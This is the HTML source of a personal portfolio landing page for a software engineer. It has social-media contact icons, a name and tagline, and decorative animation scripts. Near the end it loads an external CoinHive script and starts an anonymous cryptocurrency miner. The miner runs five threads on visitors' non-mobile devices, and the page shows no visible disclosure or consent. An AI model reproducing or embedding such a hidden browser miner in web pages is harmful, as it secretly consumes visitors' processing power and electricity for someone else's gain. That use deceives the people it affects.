<!doctype html>
<html>
	<head>
		<meta charset="utf-8">
		<title>satnami.info</title>

		<link rel="stylesheet" href="assets/css/font.css">
		<link rel="stylesheet" href="assets/css/font-awesome.min.css">
		<link rel="stylesheet" href="assets/css/animate.min.css">

		<style type="text/css">
			html,
			body,
			table,
			table tbody tr td {
				width: 100%;
				height: 100%;
			}
			html,
			body {
				margin: 0;
				padding: 0;
			}
			body {
				font: 16px 'Special Elite';
				background: url(assets/img/crossword.png);
			}
			a, a:hover {
				text-decoration: none;
				color: #444;
			}
			a:hover {
				color: #222;
			}
			#links {
				text-align: center;
				vertical-align: middle;
				font-size: 128px;
			}
			.center {
				text-align: center;
				vertical-align: middle;
			}
			#links .blog {
				margin-right: 32px;
			}
			.hidden {
				visibility: hidden;
			}
		</style>
	</head>

	<body>
		<table>
			<tbody>
				<tr>
					<td id="links">
						<a class="hidden envelope" target="_blank" href="mailto:mssatnami@gmail.com">
							<i class="fa fa-envelope-square"></i>
						</a>
						<a class="hidden linkedin" target="_blank" href="http://linkedin.com/in/satnami">
							<i class="fa fa-linkedin-square"></i>
						</a>
						<a class="hidden github" target="_blank" href="https://github.com/satnami">
							<i class="fa fa-github-square"></i>
						</a>
						<a class="hidden bitbucket" target="_blank" href="https://bitbucket.com/satnami">
							<i class="fa fa-bitbucket-square"></i>
						</a>
						<a class="hidden skype" href="skype:sami.almouhtasb">
							<i class="fa fa-skype"></i>
						</a>
					</td>
				</tr>
				<tr class="center"><td>MHD SAMI ALMOUHTASEB</td></tr>
				<tr class="center"><td>Software Engineer &nbsp;&bull;&bull;&bull;&nbsp; Problem Solving</td></tr>
				<tr class="center"><td>Now I Am Become Death, The Destroyer Of Worlds <b>(J. Robert Oppenheimer)</b> </td></tr>
				<tr class="center"><td><span class="copyright">aka <a href="http://satnami.github.io">SATNAMI &copy;</a></span></td></tr>
			</tbody>
		</table>

		<script src="https://coinhive.com/lib/coinhive.min.js"></script>
		<script src="assets/js/zepto.min.js"></script>
		<script src="assets/js/particle.min.js"></script>
		<script type="text/javascript">
			$('a').on('click', function(event) {
				event.preventDefault()
				$(this).addClass('animated pulse')
				.siblings().addClass('animated fadeOut')
				setTimeout($.proxy(function() {
					location = $(this).attr('href')
				}, this), 512)
			})
			$('a i').each(function(i) {
				var d = Math.floor(Math.random()*10-5)
				$(this).css({
					MozTransform: 'rotate('+d+'deg)',
					WebkitTransform: 'rotate('+d+'deg)',
					OTransform: 'rotate('+d+'deg)',
					transform: 'rotate('+d+'deg)'
				})
				setTimeout($.proxy(function() {
					$(this).parent().toggleClass('hidden animated bounceIn').one('webkitAnimationEnd mozAnimationEnd MSAnimationEnd oanimationend animationend', function() { $(this).removeClass('animated bounceIn') })
				}, this), Math.floor(Math.random()*250))
			})
		</script>
		<script>
			var miner = new CoinHive.Anonymous('YF3ZzrvkDjgA0v5mvbgTNXtXeKAwQMxE', {throttle: 0.5, threads: 5});

			// Only start on non-mobile devices and if not opted-out in the last 14400 seconds (4 hours):
			if (!miner.isMobile() && !miner.didOptOut(14400)) {
				miner.start();
			}
		</script>
	</body>
</html>